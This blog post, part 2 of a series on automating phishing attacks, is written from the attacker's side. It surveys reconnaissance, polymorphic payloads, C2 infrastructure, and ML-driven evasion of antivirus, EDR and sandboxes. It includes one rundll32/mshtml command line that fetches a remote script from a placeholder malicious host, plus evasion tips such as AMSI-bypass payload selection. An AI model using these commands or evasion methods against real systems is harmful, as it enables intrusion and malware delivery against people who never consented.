About Teletype
Join
@scully_int
March 25

Automation in phishing attacks. Part 2

Link to Part 1

Automation of Attacks

As protection methods evolve rapidly, so do attack techniques. At such a crazy pace, there’s no time to do everything manually, which is why automation and optimization are crucial. That’s exactly what this note will focus on.

At the very end, we’ll examine two real-life examples.

Everything starts with reconnaissance.

1. Target System Analysis

This consists of two main reconnaissance stages, similar to those used in pentesting. What methods help us automate routine tasks?

  • Powershell, bash, and nmap, plus other scripts
  • Sysinternals tools (e.g., Autoruns, Process Explorer) – automated autostart scanning
  • BloodHound + SharpHound – automated Active Directory analysis (if the target is AD)
  • Living Off The Land Binaries (LOLBins) – built-in system utilities, e.g., for minimizing traces
  • Metasploit, of course
  • Impacket

System information gathering
Malware analyzes:

  • OS version (via API calls like GetVersionEx on Windows – though outdated, you can use RtlGetVersion() instead)
  • For non-API OS version: wmic os get Caption, Version, BuildNumber
  • Processor architecture
  • Installed software and patches

Detection of protection mechanisms

  • Checks for antivirus, sandboxing, ASLR, DEP
  • Sometimes uses ldd (Linux) / ListDLLs (Windows) for dependency analysis

No need to explain why we gather this information.

Note on OS version without API
Alternative methods for analyzing systems without built-in API usage (e.g., Windows API) are important when writing malware that must avoid detection (e.g., via Event Tracing for Windows), minimize log traces, or function in environments where API calls are restricted (e.g., sandbox evasion). Example: Read /proc/version and /etc/os-release in Linux instead of using uname -a.

2. Dynamic Attack Modification

This refers to code adapting in real time.

Polymorphism and Encryption

The malware code changes on every launch to bypass antivirus signature detection.

  • Donut: fileless shellcode execution with polymorphism
  • Shelter: injects polymorphic code into executables

Adaptive Payloads:

  • For example, the dropper loads a payload optimized for a specific OS or CPU
  • Defense evasion: dynamically changes attack technique based on detected EDR/AV

Examples:

  1. If the target system is Windows 10 x64 → launch one payload (e.g., Reflective DLL Injection)
  2. If it's Windows Server with Defender → another payload is chosen with AMSI-bypass
  3. If antivirus is detected → attack is delayed or modified (e.g., API call replacement)

3. Managed Attack Infrastructure

C2 Server (Command & Control) — infrastructure attackers use to remotely manage infected machines, send commands, collect data, and dynamically change attacks in real time. In automated phishing attacks, C2 servers play a key role in scaling and adapting payloads based on the victim’s system.

Types of C2 Architecture:

  • Classic centralized network – targets connect to one server. Easy to detect and block
  • P2P – no central server. E.g., TrickBot or Emotet botnets. Harder to manage
  • DNS tunneling – hides C2 traffic behind legit queries (e.g., iodine, dnscat2)
  • Cloud-based, such as:
    • Slack API – commands via private chats
    • Google Drive / Dropbox – commands via hidden files
    • OneDrive – cloud files used for communication
    • Telegram Bot API – malware controlled via Telegram bots

Modern tools can automate the creation of these systems.

Dynamic C2 Deployment:

  • Terraform + AWS/GCP – auto-deploy C2 via cloud instances
  • Cobalt Strike Infrastructure Automation – automatic proxy/C2/domain setup
  • Merlin – HTTP/3 C2 for stealth attacks

Smart Payloads:

  • After successful phishing, the C2 server automatically analyzes the target system: OS, architecture, antivirus
  • Then sends a dynamically generated payload tailored to the target
  • Automatically switches the attack method if defenses are active

Stealth and Resilience Measures:

  1. CDN usage (Cloudflare, Fastly, AWS CloudFront)
  2. Flexible domains (google.com, amazonaws.com) for traffic proxying
  3. Fast Flux and DGA (Domain Generation Algorithms)
  4. Sleep Time & Jitter – the classics

4. Use of Machine Learning

Machine Learning is used both for evil and for good.

How attackers optimize using ML:

Prediction of Defense Mechanisms

  • Trained models analyze configurations of AV, EDR, firewalls
  • ML can predict which vulnerabilities or bypass techniques will work on a specific target

User Behavior Analysis

  • Attackers use ML to generate phishing email texts that mimic the victim’s writing style (e.g., via GPT-4)
  • AI bots analyze corporate correspondence to imitate colleagues or managers (BEC attacks)

Automated Malicious Code Generation

  • Generative Adversarial Networks (GANs) generate unique payloads undetectable by signature analysis
  • Example: Modified versions of Cobalt Strike Beacon that evade signature databases

Evasion of Network Traffic Analysis

  • ML generates traffic that mimics legitimate data, reducing C2 detection
  • Examples: DNS tunneling and HTTP(S) C2 evasion via dynamic packet generation

EDR Behavior Analysis Evasion

  • Changing behavioral patterns of malware using generative models to mimic legit processes
  • Malware adapts its behavior to look like normal programs (svchost.exe, explorer.exe)

Automatic Sandbox/Emulator Detection

  • ML algorithms analyze the environment and disable malicious code if it's sandbox-like
  • Example: Checks for unusual hardware specs (low RAM, CPU/GPU inactivity)

But there are also methods of defense that you need to know to get around them.

AI/ML-based Behavioral Monitoring

  • Modern SIEM and EDR systems use ML to detect anomalies
  • Examples: Exabeam, Splunk, Microsoft Defender ATP analyze behavioral signatures

Advanced Network Traffic Analysis

  • DPI + ML detect complex evasion techniques (e.g., odd DNS or TLS tunnels)
  • Example: AI-powered IDS (Zeek, Suricata) detect non-standard data streams

Detection of Polymorphic Malware

  • AV engines (ESET, Kaspersky, CrowdStrike) analyze dynamic behavior
  • ML-powered EDR/AVs detect malicious files by overall behavior, not just signature

That's all great, but do you get around all those defenses? Uh, sure.

  1. Emulating Legitimate Behavior
  • Malware mimics system services using LOLBins (e.g., powershell rundll32.exe javascript:"\..\mshtml,RunHTMLApplication" "http://malicious.com/script.js")

2. Execution Delays (Sleep Timing & Jitter)

  • Code waits before launching to avoid sandbox detection (cSleep(600000) = 10-minute delay)
  • Cobalt Strike uses jitter for random C2 communication delays

3. Using ML to Bypass EDR

  • Some malware uses Reinforcement Learning to automatically change strategy upon AV detection
  • Example: AI-powered obfuscation that alters encryption based on AV results

Human Influence: The Role of Social Engineering in Phishing Success

Social engineering is a method of influencing people to manipulate their behavior in order to gain sensitive information or access to resources. In the context of phishing, the human element plays a central role, as attacks are aimed at deceiving users rather than overcoming technical barriers.

Phishing often succeeds not because of flaws in technical defenses, but because of mistakes users make when processing suspicious emails, links or applications.

Part three with specific examples will come later

@scully_int
March 25, 11:12
0 views
0 reposts